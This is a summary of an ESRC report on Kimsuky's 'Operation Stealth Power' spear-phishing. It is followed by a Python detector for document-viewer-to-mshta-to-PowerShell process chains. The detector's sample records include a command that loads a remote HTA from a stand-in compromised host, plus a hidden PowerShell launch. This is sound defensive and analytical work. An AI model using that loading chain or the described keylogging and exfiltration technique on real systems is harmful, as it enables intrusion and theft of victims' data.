Kimsuky Group, Operation Stealth Power: a Silent Operation
2019-04-03 • ESTSecurity • Kimsuky organization, Operation Stealth Power silence operation
ESRC reports Kimsuky spear-phishing against South Korean diplomacy, security, unification, North Korea-related, and defector-focused organizations, tying the activity to Operation Low Kick and Operation Stealth Power. The attackers sent carefully written Korean-language emails with encrypted malicious HWP attachments, placing the password in the email body so that the attachment could not be scanned or analysed without it, which hinders analysis and lowers the chance of detection by security products. After the HWP exploit ran, shellcode contacted a compromised Korean C2 host, launched mshta.exe to load first.hta, and progressed through HTA, VBScript, PHP, and PowerShell stages. The final PowerShell script collected keystrokes, process lists, service lists, and other victim information, then exfiltrated it through upload.php. ESRC also notes related credential-phishing activity that used the same host and a shared “Tom” document author account, strengthening the link across the observed Kimsuky operations.
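As an added defensive example, not code from the ESRC report: a small Python detector that looks for the execution chain described above (mshta.exe loading a remote .hta from a document viewer and then spawning PowerShell) over constructed Sysmon-style process-creation records; the viewer process name hwp.exe, the hostnames and the command lines are assumptions.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation records, not taken from the report.
# hwp.exe as the HWP viewer process name is an assumption.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Hnc\Hwp.exe", "cmdline": r"Hwp.exe C:\Users\u\Downloads\invite.hwp"},
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe http://compromised.example/first.hta"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -Command <script>"},
    {"pid": 400, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 500, "ppid": 400, "image": r"C:\Windows\System32\mshta.exe", "cmdline": "mshta.exe https://intranet.example/tool.hta"},
    {"pid": 600, "ppid": 1,   "image": r"C:\Windows\System32\mshta.exe", "cmdline": r"mshta.exe C:\Program Files\Vendor\setup.hta"},
]

REMOTE_HTA = re.compile(r"https?://\S+\.hta\b", re.IGNORECASE)
DOC_HANDLERS = {"hwp.exe", "hwpviewer.exe", "winword.exe"}  # document viewers that should never spawn mshta
SHELLS = {"powershell.exe", "pwsh.exe"}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def descendants(children, pid):
    """Yield every process transitively spawned by pid."""
    stack = list(children.get(pid, []))
    while stack:
        ev = stack.pop()
        yield ev
        stack.extend(children.get(ev["pid"], []))

def find_hta_chains(events):
    """Flag mshta.exe loading a remote .hta; score higher when the parent is a
    document viewer and when PowerShell appears among its descendants."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e)
    findings = []
    for e in events:
        if basename(e["image"]) != "mshta.exe":
            continue
        m = REMOTE_HTA.search(e["cmdline"])
        if not m:
            continue  # local .hta launches (installers, admin tools) are not flagged here
        parent = by_pid.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else "unknown"
        spawned_ps = any(basename(d["image"]) in SHELLS for d in descendants(children, e["pid"]))
        score = 1 + int(parent_name in DOC_HANDLERS) + int(spawned_ps)
        findings.append({"pid": e["pid"], "parent": parent_name, "url": m.group(0),
                         "powershell_child": spawned_ps, "score": score})
    return findings

if __name__ == "__main__":
    for f in find_hta_chains(SAMPLE_EVENTS):
        print(f)
```

The score separates the full document-viewer to mshta.exe to PowerShell chain (score 3) from a lone remote .hta launch by a user shell (score 1), which is the threshold a SOC would tune before alerting.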